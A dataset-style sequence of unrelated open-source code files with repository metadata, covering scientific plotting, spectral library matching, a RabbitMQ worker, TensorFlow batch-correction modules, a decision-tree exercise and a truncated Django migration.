        # The x * 1.2 stretch appears to be a cosmetic aspect tweak -- confirm.
        surf = ax.scatter(preds[:, 0] * 1.2,
                          preds[:, 1],
                          preds[:, 2],
                          c='cyan',
                          alpha=1.0,
                          edgecolor='b')
        for pred_type in pred_types.values():
            ax.plot3D(preds[pred_type.slice, 0] * 1.2,
                      preds[pred_type.slice, 1],
                      preds[pred_type.slice, 2], color='blue')
        # Look straight down the z axis and mirror x so it matches the image.
        ax.view_init(elev=90., azim=90.)
        ax.set_xlim(ax.get_xlim()[::-1])
    if filename:
        plt.savefig(filename)
    else:
        plt.show()
| [
"sliu1@uvm.edu"
] | sliu1@uvm.edu |
ccf168d72c282c2859a790895709e0783e39b3d3 | 6556f14abd6d910b1eded20b5419d07b2d8b4a91 | /code/spec_lib.py | 903bee9568ca94d404292fe293f9706084e35008 | [] | no_license | sdrogers/molnet | 42ca6c8e5392dd576c65d4461b028b1f0c677eb7 | 2d7746f86df65638fc3fef7dfc53e83e1a042840 | refs/heads/master | 2020-03-25T20:17:57.504641 | 2019-10-08T19:37:58 | 2019-10-08T19:37:58 | 144,124,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,001 | py | # some code for spectral library things
MOLNET_PATH = '/Users/simon/git/molnet/code'
import sys
sys.path.append(MOLNET_PATH)
from scoring_functions import fast_cosine,fast_cosine_shift
class SpecLib(object):
    """A spectral library loaded from an MGF file, with precursor-windowed
    cosine matching against query spectra."""

    def __init__(self, mgf_file):
        self.mgf_file = mgf_file
        self.spectra = None  # dict: spectrum id -> spectrum object, set by _load_mgf

    def _load_mgf(self, id_field='SPECTRUMID'):
        """Load spectra from the MGF file and tag each with its library id."""
        from mnet_utilities import load_mgf
        self.spectra = load_mgf(self.mgf_file, id_field=id_field)
        for k, v in self.spectra.items():
            v.spectrum_id = k

    def get_n_spec(self):
        """Number of spectra in the library."""
        return len(self.spectra)

    def get_keys(self):
        """All spectrum ids."""
        return list(self.spectra.keys())

    def get_n_peaks(self):
        """Peak count of every spectrum."""
        return [s.n_peaks for s in self.spectra.values()]

    def filter(self):
        """Apply each spectrum's top-k peak filter in place (with progress prints)."""
        # top_k_filter
        n_done = 0
        for s_id, spec in self.spectra.items():
            spec.keep_top_k()
            n_done += 1
            if n_done % 100 == 0:
                print("Filtered {}".format(n_done))

    def spectral_match(self, query,
                       scoring_function=fast_cosine,
                       ms2_tol=0.2,
                       min_match_peaks=1,
                       ms1_tol=0.2,
                       score_thresh=0.7):
        """Return (spectrum_id, score) for every library spectrum within
        ms1_tol of the query's precursor m/z scoring >= score_thresh."""
        # make a sorted list for quick precursor matching
        # (sorting relies on the spectrum class's comparison operators,
        #  presumably ordering by precursor_mz -- confirm in its definition)
        spec_list = [s for s in self.spectra.values()]
        spec_list.sort()
        candidates = self._candidates(spec_list, query.precursor_mz, ms1_tol)
        hits = []
        for c in candidates:
            sc, _ = scoring_function(query, c, ms2_tol, min_match_peaks)
            if sc >= score_thresh:
                hits.append((c.spectrum_id, sc))
        return hits

    def _candidates(self, mz_list, query_mz, ms1_tol):
        """Slice out the spectra whose precursor m/z lies in [query-tol, query+tol].
        ``mz_list`` must already be sorted by precursor m/z."""
        from sortedcontainers import SortedList
        pmz_list = SortedList([m.precursor_mz for m in mz_list])
        lower = query_mz - ms1_tol
        upper = query_mz + ms1_tol
        # NOTE(review): SortedList.bisect is bisect_right, so a spectrum whose
        # precursor equals ``lower`` exactly is excluded -- bisect_left may be
        # intended for the lower bound.
        start = pmz_list.bisect(lower)
        end = pmz_list.bisect(upper)
        return mz_list[start:end]
| [
"simon.d.rogers@gmail.com"
] | simon.d.rogers@gmail.com |
10bf514a20f40a187f52119fd1bd1155a820dacb | f029e4ae41336c6f7ea2a7b06a134e0038fa3a72 | /workers/rabbit_worker.py | 01dc6f494a1dc2122ed978317a7869af482a8105 | [] | no_license | KaltakhchyanD/flask_message_queueueue | 78b9cab8eb7c83e37a7838551ce7712d747da85d | f3110ca4cfa19451d75a7f832529ac3214fc8154 | refs/heads/master | 2023-03-03T14:33:50.746055 | 2021-02-13T13:55:53 | 2021-02-13T13:55:53 | 293,317,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,344 | py | import datetime
import json
import os
import random
import time
import pika
def run_worker():
    # Constructing a RabbitWorker runs the whole consume loop (it blocks).
    worker = RabbitWorker()
class RabbitWorker:
    """RabbitMQ consumer that echoes each message back on its reply-to queue.

    NOTE(review): all work happens inside __init__, which blocks forever in
    start_consuming(); instantiation == running the worker.
    """

    def __init__(self, worker_name="that_default_worker"):
        # Monotonic counter of messages handled by this worker instance.
        self.task_number_from_worker = 0
        self.worker_name = worker_name
        # Sleep for 20 sec to ensure that rabbit server started
        # (the actual delay below is 40 s despite the comment above).
        print(" [*] Sleeping for 40 seconds.")
        time.sleep(40)
        print(" [*] After sleep")
        print(" [*] Connecting to server ...")
        # Connection parameters come from the environment (docker-compose style).
        self.user = os.getenv("RABBIT_USER")
        self.password = os.getenv("RABBIT_PASSWORD")
        self.host = os.getenv("RABBIT_HOST")
        self.credentials = pika.PlainCredentials(self.user, self.password)
        self.connection = pika.BlockingConnection(
            pika.ConnectionParameters(host=self.host, credentials=self.credentials)
        )
        self.channel = self.connection.channel()
        print(f" [?] Channel at RabbitWorker : {self.channel}")
        print(f" [?] IS IT OPEN : {self.channel.is_open}")
        # print(f" [?] ITS DIR : {dir(self.channel)}")
        print(f" [?] ITS NUMBER : {self.channel.channel_number}")
        # Declare default queue to get messages from RabbitClient
        self.channel.queue_declare(queue="message_q_0", durable=True)
        self.channel.queue_declare(queue="message_q_1", durable=True)
        self.channel.queue_declare(queue="message_q_2", durable=True)
        ## Declare queue that contains messages for worker
        ## to declare to newly created queue
        ## So queues can be created at RabbitClient
        ## and then worker can declare it to and start consuming
        # queue_to_create_queues = "create_queue"
        ##self.rabbit_queue_list.append(queue_to_create_queues)
        # self.channel.queue_declare(queue=queue_to_create_queues, durable=True)

        def callback(ch, method, properties, body):
            # RPC-style handler: log, simulate work, then publish an annotated
            # copy of the message to the reply-to queue and ack the original.
            print(f" [x] Received {body} of id {properties.correlation_id}")
            with open("temp.txt", "a") as file:
                file.write(f"{datetime.datetime.now()} \n")
            # Random 10-20 s delay stands in for real processing time.
            random_delay = random.randint(10, 20)
            print(f" [x] Delaing for {random_delay} sec")
            time.sleep(random_delay)
            print(f"Num - {self.task_number_from_worker}")
            self.task_number_from_worker += 1
            new_body = (
                body.decode() + f" {self.task_number_from_worker}, from {worker_name}"
            )
            new_body = new_body.encode()
            ch.basic_publish(
                exchange="",
                routing_key=properties.reply_to,
                body=new_body,
                properties=pika.BasicProperties(
                    correlation_id=properties.correlation_id
                ),
            )
            ch.basic_ack(delivery_tag=method.delivery_tag)

        # Deliver at most one unacked message at a time (fair dispatch).
        self.channel.basic_qos(prefetch_count=1)
        self.channel.basic_consume(queue="message_q_0", on_message_callback=callback)
        self.channel.basic_consume(queue="message_q_1", on_message_callback=callback)
        self.channel.basic_consume(queue="message_q_2", on_message_callback=callback)
        print(" [*] Waiting for messages. To exit press CTRL+C")
        # Blocks until the consumer loop is stopped (e.g. Ctrl+C).
        self.channel.start_consuming()
        print("End of worker")
# Script entry point: build and run the blocking worker.
if __name__ == "__main__":
    run_worker()
| [
"rafikrafikrafik@yandex.ru"
] | rafikrafikrafik@yandex.ru |
97a317fe145ad1ecc4ed62bd7143ced9eb3b62be | 7096272d59082433d4d3852b9969e6ddce06d928 | /Artificial Intelligence/laptopbatterylife.py | 7a109c0a563d141c65dc81d7ca0681eb3fecf110 | [] | no_license | sanjanprakash/Hackerrank | 5b9c8e6a926e2555ebfa738d2eaed738000e52c1 | 94b20021b9e931fbb6746da324d0871dd371b42c | refs/heads/master | 2020-03-27T20:00:45.435682 | 2019-06-14T02:56:25 | 2019-06-14T02:56:25 | 147,030,844 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import numpy as np
# HackerRank "Laptop Battery Life" (Python 2): fit a line through the
# training points on the unsaturated region (< 8 hours), then predict.
x,y = [],[]
with open("trainingdata.txt", "r") as filestream:
    for line in filestream :
        currentline = line.split(",")
        # Only keep samples below the 8-hour saturation cap for the fit.
        if (float(currentline[1]) < 8.0) :
            x.append(float(currentline[0]))
            y.append(float(currentline[1]))
# Least-squares line: battery_life ~ m * charge_time + b.
m,b = np.polyfit(x,y,1)
inp = float(raw_input())
# Battery life saturates at 8 hours (slope is ~2 on the linear region).
if (2 * inp >= 8.0) :
    print "8.00"
else :
    print round(m*inp + b,2)
| [
"noreply@github.com"
] | sanjanprakash.noreply@github.com |
c97124271bc6733cf52b3bba45b66aac83594937 | c50598d4ce8e6c906748021060f1df84e16372ca | /Cell_BLAST/rmbatch.py | 655f033ddd7728aabe6e52fbaf541a4df57fa836 | [
"MIT"
] | permissive | BacemDataScience/Cell_BLAST | f4407571e321fbc6aeb8642a994767e6e1f381fa | d0e25fa695cb8cebcba68dd32fe5e7e96743803f | refs/heads/master | 2020-09-10T02:31:00.758648 | 2019-09-28T16:06:55 | 2019-09-28T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,479 | py | """
Batch effect removing modules for DIRECTi
"""
import tensorflow as tf
from . import nn
from . import module
from . import utils
class RMBatch(module.Module):
    """
    Parent class for systematical bias / batch effect removal modules.
    """
    def __init__(self, batch_dim, delay=20, name="RMBatch"):
        """batch_dim: number of batches; delay: epochs to wait before the
        regularizer becomes active (enforced via _delay_guard)."""
        super(RMBatch, self).__init__(name=name)
        self.batch_dim = batch_dim
        self.delay = delay
        # Register the delay guard once on the epoch-end callback list.
        if self._delay_guard not in self.on_epoch_end:
            self.on_epoch_end.append(self._delay_guard)
    def _build_regularizer(self, input_tensor, training_flag, epoch, scope=""):
        """Create the one-hot batch-label placeholder; the base class adds no
        regularization loss (returns 0.0). Subclasses override this."""
        with tf.name_scope("placeholder/"):
            self.batch = tf.placeholder(
                dtype=tf.float32, shape=(None, self.batch_dim),
                name=self.scope_safe_name
            )
        return 0.0
    def _build_feed_dict(self, data_dict):
        # Feed the (densified) batch-label matrix only if this module's
        # column is present in the minibatch dict.
        return {
            self.batch: utils.densify(data_dict[self.name])
        } if self.name in data_dict else {}
    def __bool__(self):
        # Any configured batch-removal module is truthy (cf. a null module).
        return True
    def _get_config(self):
        # Serializable constructor arguments, merged with the parent's.
        return {
            "batch_dim": self.batch_dim,
            "delay": self.delay,
            **super(RMBatch, self)._get_config()
        }
    def _delay_guard(self, model, train_data_dict, val_data_dict, loss):
        # Epoch-end hook: reports whether the delay period has elapsed
        # (presumably gating early-stopping bookkeeping in module.Module --
        # confirm there).
        _epoch = model.sess.run(model.epoch)
        return _epoch >= self.delay
class Adversarial(RMBatch):
    """
    Build a batch effect correction module that uses adversarial batch alignment.
    Parameters
    ----------
    batch_dim : int
        Number of batches.
    h_dim : int
        Dimensionality of the hidden layers in the discriminator MLP, by default 128.
    depth : int
        Number of hidden layers in the discriminator MLP, by default 1.
    dropout : float
        Dropout rate, by default 0.0.
    lambda_reg : float
        Strength of batch effect correction, by default 0.01.
    n_steps : int
        How many discriminator steps to run for each encoder step, by default 1.
    name : str
        Name of the module, by default "AdvBatch".
    """
    def __init__(self, batch_dim, h_dim=128, depth=1, dropout=0.0,
                 lambda_reg=0.01, n_steps=1, delay=20, name="AdvBatch"):
        super(Adversarial, self).__init__(batch_dim, delay=delay, name=name)
        self.h_dim = h_dim
        self.depth = depth
        self.dropout = dropout
        self.lambda_reg = lambda_reg
        self.n_steps = n_steps
    def _build_regularizer(self, input_tensor, training_flag,
                           epoch, scope="discriminator"):
        """Build the batch discriminator; return the (scaled) generator loss
        to be added to the encoder's objective."""
        with tf.name_scope("placeholder/"):
            self.batch = tf.placeholder(
                dtype=tf.float32, shape=(None, self.batch_dim),
                name=self.scope_safe_name
            )
        self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
        with tf.variable_scope(self.build_regularizer_scope):
            # Keep only samples that actually carry a batch label
            # (one-hot rows sum to > 0); unlabeled rows are dropped.
            mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
            batch = tf.dynamic_partition(self.batch, mask, 2)[1]
            input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
            # Discriminator MLP predicting the batch from the latent vector.
            batch_pred = tf.identity(nn.dense(nn.mlp(
                input_tensor, [self.h_dim] * self.depth,
                dropout=self.dropout, training_flag=training_flag
            ), self.batch_dim), "batch_logit")
            # Discriminator loss, zeroed out until `delay` epochs have passed.
            self.batch_d_loss = tf.cast(
                epoch >= self.delay, tf.float32
            ) * tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits_v2(
                    labels=batch, logits=batch_pred
                ), name="d_loss"
            )
            # The encoder ("generator") maximizes the discriminator loss.
            self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
        return self.lambda_reg * self.batch_g_loss
    def _compile(self, optimizer, lr):
        """Create the discriminator optimizer; `n_steps` updates are chained
        via control dependencies so each training step runs them in sequence."""
        with tf.variable_scope("optimize/%s" % self.scope_safe_name):
            optimizer = getattr(tf.train, optimizer)(lr)
            control_dependencies = []
            for _ in range(self.n_steps):
                with tf.control_dependencies(control_dependencies):
                    # Only the discriminator's own variables are updated here.
                    self.step = optimizer.minimize(
                        self.lambda_reg * self.batch_d_loss,
                        var_list=tf.get_collection(
                            tf.GraphKeys.TRAINABLE_VARIABLES,
                            self.build_regularizer_scope
                        )
                    )
                    control_dependencies = [self.step]
            tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
    def _get_config(self):
        # Serializable constructor arguments, merged with the parent's.
        return {
            "h_dim": self.h_dim,
            "depth": self.depth,
            "dropout": self.dropout,
            "lambda_reg": self.lambda_reg,
            "n_steps": self.n_steps,
            **super(Adversarial, self)._get_config()
        }
class MNN(RMBatch):
    """
    Build a batch effect correction module that uses mutual nearest neighbor
    (MNN) distance regularization.

    Parameters
    ----------
    batch_dim : int
        Number of batches.
    n_neighbors : int
        Number of nearest neighbors to use when selecting mutual nearest
        neighbors, by default 5.
    lambda_reg : float
        Strength of batch effect correction, by default 1.0,
    delay : int
        How many epoches to delay before using MNN batch correction,
        by default 20.
    name : str
        Name of the module, by default "MNNBatch".
    """

    def __init__(
            self, batch_dim, n_neighbors=5, lambda_reg=1.0,
            delay=20, name="MNN"
    ):
        super(MNN, self).__init__(batch_dim, delay=delay, name=name)
        self.n_neighbors = n_neighbors
        self.lambda_reg = lambda_reg

    def _build_regularizer(self, input_tensor, training_flag, epoch, scope="MNN"):
        """
        Return the MNN distance penalty: mean squared distance between
        mutual-nearest-neighbor pairs across every pair of batches.
        """
        with tf.name_scope("placeholder/"):
            # One-hot batch identity per cell.
            self.batch = tf.placeholder(dtype=tf.float32, shape=(
                None, self.batch_dim
            ), name=self.scope_safe_name)
        with tf.name_scope("%s/%s" % (scope, self.scope_safe_name)):
            # Split cells into per-batch groups by their batch label.
            batches = tf.dynamic_partition(
                input_tensor,
                partitions=tf.argmax(self.batch, axis=1, output_type=tf.int32),
                num_partitions=self.batch_dim
            )
            use_flags = [tf.shape(batch)[0] > 0 for batch in batches]
            penalties = []
            for i in range(len(batches)):
                for j in range(i + 1, len(batches)):
                    # Default-arg lambdas freeze i/j at definition time; the
                    # else-branch yields an empty tensor when either batch is
                    # absent from the minibatch.
                    penalties.append(tf.cond(
                        tf.logical_and(use_flags[i], use_flags[j]),
                        lambda i=i, j=j: self._cross_batch_penalty(batches[i], batches[j]),
                        lambda: tf.zeros((0,))
                    ))
            penalties = tf.concat(penalties, axis=0)
            # NOTE(review): gate is `epoch > self.delay` here while
            # Adversarial uses `>=` -- confirm the off-by-one is intentional.
            return tf.cast(
                epoch > self.delay, tf.float32
            ) * self.lambda_reg * tf.reduce_mean(penalties, name="MNN_loss")

    def _cross_batch_penalty(self, x, y):  # MNN
        """Masked squared distances between two batches, flattened to 1-D."""
        x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
        # Pairwise squared Euclidean distances, shape (|x|, |y|).
        xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
        xy_mask = tf.cast(self._mnn_mask(xy_dist, self.n_neighbors), tf.float32)
        # NOTE(review): non-MNN entries remain in the flattened result as
        # zeros, so the caller's reduce_mean averages over all |x|*|y|
        # pairs rather than MNN pairs only -- confirm intended scaling.
        return tf.reshape(xy_dist * xy_mask, [-1])

    @staticmethod
    def _neighbor_mask(d, k):
        """Boolean mask marking, per row of distance matrix d, its k nearest columns."""
        n = tf.shape(d)[1]
        # top_k of the negated distances == the k smallest distances per row.
        _, idx = tf.nn.top_k(tf.negative(d), k=tf.minimum(k, n))
        return tf.cast(tf.reduce_sum(tf.one_hot(idx, depth=n), axis=1), tf.bool)

    @staticmethod
    def _mnn_mask(d, k):
        """Mask of (row, col) pairs that are in each other's k-nearest sets."""
        return tf.logical_and(
            MNN._neighbor_mask(d, k),
            tf.transpose(MNN._neighbor_mask(tf.transpose(d), k))
        )

    def _get_config(self):
        """Serialize hyperparameters, merged with the parent configuration."""
        return {
            "n_neighbors": self.n_neighbors,
            "lambda_reg": self.lambda_reg,
            **super(MNN, self)._get_config()
        }
class MNNAdversarial(Adversarial, MNN):
    """
    Build a batch effect correction module that uses adversarial batch alignment
    among cells with mutual nearest neighbors.

    Parameters
    ----------
    batch_dim : int
        Number of batches.
    h_dim : int
        Dimensionality of the hidden layers in the discriminator MLP, by default 128.
    depth : int
        Number of hidden layers in the discriminator MLP, by default 1.
    dropout : float
        Dropout rate, by default 0.0.
    lambda_reg : float
        Strength of batch effect correction, by default 0.01,
    n_steps : int
        How many discriminator steps to run for each encoder step, by default 1.
    n_neighbors : int
        Number of nearest neighbors to use when selecting mutual nearest
        neighbors, by default 5.
    delay : int
        How many epoches to delay before using MNN batch correction,
        by default 20.
    name : str
        Name of the module, by default "MNNAdvBatch".
    """

    def __init__(
            self, batch_dim, h_dim=128, depth=1, dropout=0.0,
            lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
            name="MNNAdvBatch"
    ):
        super(MNNAdversarial, self).__init__(
            batch_dim, h_dim, depth, dropout, lambda_reg, n_steps,
            delay=delay, name=name
        )  # Calls Adversarial.__init__
        self.n_neighbors = n_neighbors

    def _build_regularizer(self, input_tensor, training_flag,
                           epoch, scope="discriminator"):
        """
        Same adversarial game as ``Adversarial``, but the discriminator only
        sees cells that have at least one mutual nearest neighbor in another
        batch (cells unlikely to represent batch-specific populations).
        """
        with tf.name_scope("placeholder/"):
            self.batch = tf.placeholder(
                dtype=tf.float32, shape=(None, self.batch_dim),
                name=self.scope_safe_name
            )
        self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
        with tf.variable_scope(self.build_regularizer_scope):
            # Keep only cells with known batch identity.
            mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
            batch = tf.dynamic_partition(self.batch, mask, 2)[1]
            input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
            # Prepend each row's index as an extra column so original row
            # positions survive the per-batch dynamic_partition below.
            input_idx = tf.expand_dims(tf.cast(
                tf.range(tf.shape(input_tensor)[0]), tf.float32
            ), axis=1)
            _input_tensor = tf.concat([input_idx, input_tensor], axis=1)
            batches = tf.dynamic_partition(
                _input_tensor,
                partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
                num_partitions=self.batch_dim
            )
            use_flags = [tf.shape(item)[0] > 0 for item in batches]
            # Split back into (row indices, embeddings) per batch.
            batches = [(item[:, 0], item[:, 1:]) for item in batches]
            include_idx = []
            for i in range(len(batches)):
                for j in range(i + 1, len(batches)):
                    # For each batch pair, collect indices of cells that have
                    # a mutual nearest neighbor in the other batch.
                    include_idx.append(tf.cond(
                        tf.logical_and(use_flags[i], use_flags[j]),
                        lambda i=i, j=j: self._mnn_idx(batches[i], batches[j], self.n_neighbors),
                        lambda: (tf.zeros((0,)), tf.zeros((0,)))
                    ))
            include_idx = [j for i in include_idx for j in i]  # flatten
            # De-duplicate indices collected from multiple batch pairs.
            self.include_idx = tf.unique(tf.cast(
                tf.concat(include_idx, axis=0), tf.int32))[0]
            input_tensor = tf.gather(input_tensor, self.include_idx)
            batch = tf.gather(batch, self.include_idx)
            # Discriminator over the MNN-participating cells only.
            batch_pred = tf.identity(nn.dense(nn.mlp(
                input_tensor, [self.h_dim] * self.depth,
                dropout=self.dropout, training_flag=training_flag
            ), self.batch_dim), "batch_logit")
            self.batch_d_loss = tf.multiply(tf.cast(
                epoch >= self.delay, tf.float32
            ), tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits_v2(
                    labels=batch, logits=batch_pred
                ), name="raw_d_loss"
            ), name="d_loss")
            self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
        return self.lambda_reg * self.batch_g_loss

    @staticmethod
    def _mnn_idx(batch1, batch2, k):
        """
        Given (row_index, embedding) pairs for two batches, return the row
        indices of cells in each batch that have at least one mutual
        nearest neighbor in the other batch.
        """
        (xi, x), (yi, y) = batch1, batch2
        x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
        # Pairwise squared Euclidean distances, shape (|x|, |y|).
        xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
        xy_mask = tf.cast(MNNAdversarial._mnn_mask(xy_dist, k), tf.int32)
        return (
            # Rows of x matched by >= 1 mutual neighbor in y ...
            tf.dynamic_partition(xi, tf.cast(
                tf.reduce_sum(xy_mask, axis=1) > 0, tf.int32
            ), 2)[1],
            # ... and rows of y matched by >= 1 mutual neighbor in x.
            tf.dynamic_partition(yi, tf.cast(
                tf.reduce_sum(xy_mask, axis=0) > 0, tf.int32
            ), 2)[1]
        )
# EXPERIMENTAL
class AdaptiveMNNAdversarial(MNNAdversarial):
    """
    EXPERIMENTAL variant of ``MNNAdversarial``.

    The discriminator is trained exactly as in ``MNNAdversarial``, but the
    generator loss for each cell restricts the softmax to the subset of
    batches that cell actually shares mutual nearest neighbors with
    (tracked in ``self.mask_mat``).
    """

    def __init__(
            self, batch_dim, h_dim=128, depth=1, dropout=0.0,
            lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
            name="AdptMNNAdvBatch"
    ):
        super(AdaptiveMNNAdversarial, self).__init__(
            batch_dim, h_dim, depth, dropout, lambda_reg, n_steps, n_neighbors,
            delay=delay, name=name
        )

    def _build_regularizer(self, input_tensor, training_flag,
                           epoch, scope="discriminator"):
        """Build discriminator/generator losses with per-cell batch masks."""
        with tf.name_scope("placeholder/"):
            self.batch = tf.placeholder(
                dtype=tf.float32, shape=(None, self.batch_dim),
                name=self.scope_safe_name
            )
        self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
        with tf.variable_scope(self.build_regularizer_scope):
            # Select cells with batch identity
            mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
            batch = tf.dynamic_partition(self.batch, mask, 2)[1]
            input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
            # Build MNN mask
            n = tf.shape(batch)[0]
            # Index-tagging trick: carry each row's original position through
            # the per-batch dynamic_partition as an extra leading column.
            input_idx = tf.expand_dims(tf.cast(tf.range(n), tf.float32), axis=1)
            _input_tensor = tf.concat([input_idx, input_tensor], axis=1)
            batches = tf.dynamic_partition(
                _input_tensor,
                partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
                num_partitions=self.batch_dim
            )
            use_flags = [tf.shape(item)[0] > 0 for item in batches]
            batches = [(item[:, 0], item[:, 1:]) for item in batches]
            self.mask_mat = []
            for i in range(len(batches)):
                for j in range(i + 1, len(batches)):
                    # idx_mask marks (length-n, 0/1) the cells that have an
                    # MNN partner across the (i, j) batch pair.
                    idx_mask = tf.cond(
                        tf.logical_and(use_flags[i], use_flags[j]),
                        lambda i=i, j=j: self._mnn_idx_mask(
                            batches[i], batches[j], self.n_neighbors, n),
                        lambda: tf.zeros((n,))
                    )
                    idx_mask = tf.expand_dims(idx_mask, axis=1)
                    # Scatter the pair's mask into batch columns i and j of
                    # an (n, batch_dim) matrix.
                    self.mask_mat.append(tf.concat([
                        tf.zeros((n, i)), idx_mask,
                        tf.zeros((n, j - i - 1)), idx_mask,
                        tf.zeros((n, self.batch_dim - j - 1))
                    ], axis=1))
            self.mask_mat = tf.cast(tf.add_n(self.mask_mat) > 0, tf.int32)
            # Keep only cells participating in at least one MNN pair.
            include_mask = tf.cast(tf.reduce_sum(
                self.mask_mat, axis=1
            ) > 0, tf.int32)
            self.mask_mat = tf.dynamic_partition(self.mask_mat, include_mask, 2)[1]
            batch = tf.dynamic_partition(batch, include_mask, 2)[1]
            input_tensor = tf.dynamic_partition(input_tensor, include_mask, 2)[1]
            # Discriminator loss
            batch_pred = tf.identity(nn.dense(nn.mlp(
                input_tensor, [self.h_dim] * self.depth,
                dropout=self.dropout, training_flag=training_flag
            ), self.batch_dim), "batch_logit")
            self.batch_d_loss = tf.cast(
                epoch >= self.delay, tf.float32
            ) * tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits_v2(
                    labels=batch, logits=batch_pred
                ), name="d_loss"
            )
            # Generator loss: per-cell cross entropy with the softmax
            # restricted to that cell's masked batch columns.
            self.batch_g_loss = tf.cast(
                epoch >= self.delay, tf.float32
            ) * tf.negative(tf.reduce_mean(tf.scan(
                self._masked_softmax_cross_entropy_with_logits,
                (batch, batch_pred, self.mask_mat),
                tf.zeros(()), parallel_iterations=128
            )), name="g_loss")
        self.vars_to_save += tf.get_collection(
            tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
        tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
        return self.lambda_reg * self.batch_g_loss

    @staticmethod
    def _mnn_idx_mask(batch1, batch2, k, n):
        """Length-n 0/1 vector marking rows with an MNN partner across the pair."""
        idx1, idx2 = AdaptiveMNNAdversarial._mnn_idx(batch1, batch2, k)
        idx = tf.cast(tf.concat([idx1, idx2], axis=0), tf.int32)
        return tf.reduce_sum(tf.one_hot(idx, depth=n), axis=0)

    @staticmethod
    def _masked_softmax_cross_entropy_with_logits(cum, tensors):
        """
        ``tf.scan`` step: cross entropy for one cell with the softmax
        restricted to the batch columns selected by the cell's mask.

        ``cum`` (the scan accumulator) is intentionally unused; scan only
        requires the two-argument signature.
        """
        labels, logits, mask = tensors
        labels = tf.dynamic_partition(labels, mask, 2)[1]
        logits = tf.dynamic_partition(logits, mask, 2)[1]
        # logsumexp(logits) - logits == -log softmax(logits); weighting by
        # the one-hot labels yields the cross entropy over masked classes.
        return tf.reduce_sum(labels * (tf.reduce_logsumexp(logits) - logits))
| [
"caozj@mail.cbi.pku.edu.cn"
] | caozj@mail.cbi.pku.edu.cn |
d9ccb81408261f7b5cc455c780766b88898ca463 | 9b452360c98fba2ff70986f498d372fcd70e5970 | /py3-battle-env/battle-expert/Toolbox_Python/Scripts/ex5_1_2.py | e3a64191ab9372aad5244d3a846a0053b8366635 | [] | no_license | ChristineAlb/Pokemon-battle-expert | 2e9ac837fb4813da2bd4c27dac1a5690e6ccc1b2 | 06a2700a020a9c12993c2824c628fe52ced186d9 | refs/heads/master | 2021-04-28T07:06:23.330276 | 2018-02-20T13:32:41 | 2018-02-20T13:32:41 | 122,212,987 | 1 | 0 | null | 2018-02-20T15:00:42 | 2018-02-20T15:00:41 | null | UTF-8 | Python | false | false | 530 | py | # exercise 5.1.2
import numpy as np
from sklearn import tree

# requires data from exercise 5.1.1
# NOTE(review): the star import is expected to supply X, y and
# attributeNames (and transitively runs ex5_1_1's top-level code) --
# verify before converting to explicit imports.
from ex5_1_1 import *

# Fit regression tree classifier, Gini split criterion, no pruning
# (min_samples_split=2 is the sklearn default, i.e. the tree is grown fully).
dtc = tree.DecisionTreeClassifier(criterion='gini', min_samples_split=2)
dtc = dtc.fit(X,y)

# Export tree graph for visualization purposes:
# (note: you can use i.e. Graphviz application to visualize the file)
out = tree.export_graphviz(dtc, out_file='tree_gini.gvz', feature_names=attributeNames)

print('Ran Exercise 5.1.2')
"sofus@addington.dk"
] | sofus@addington.dk |
0d58ee0fc15f659c077b1143a02bb66111a89c74 | ba40a5988387b170b45b75137b896630960f3450 | /profiles/migrations/0001_initial.py | f93cfe82de101846cc8bfd406204f4f9a4bb5b50 | [] | no_license | Darian-Frey/pulchra-libri | ae3626a5042c73bc4b61e1ccbfde89d986230dcd | ae1c98609c5106a134f86fe38bf8f9cc59417278 | refs/heads/main | 2023-08-12T06:01:19.906159 | 2021-09-30T23:18:53 | 2021-09-30T23:18:53 | 400,846,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # Generated by Django 3.2.7 on 2021-09-12 20:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
# Auto-generated by makemigrations; avoid hand-editing the schema here --
# create a follow-up migration for any changes instead.
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        # Depends on whichever user model is active (settings.AUTH_USER_MODEL).
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Default delivery/contact details; all optional so a profile
                # can exist before the user fills anything in.
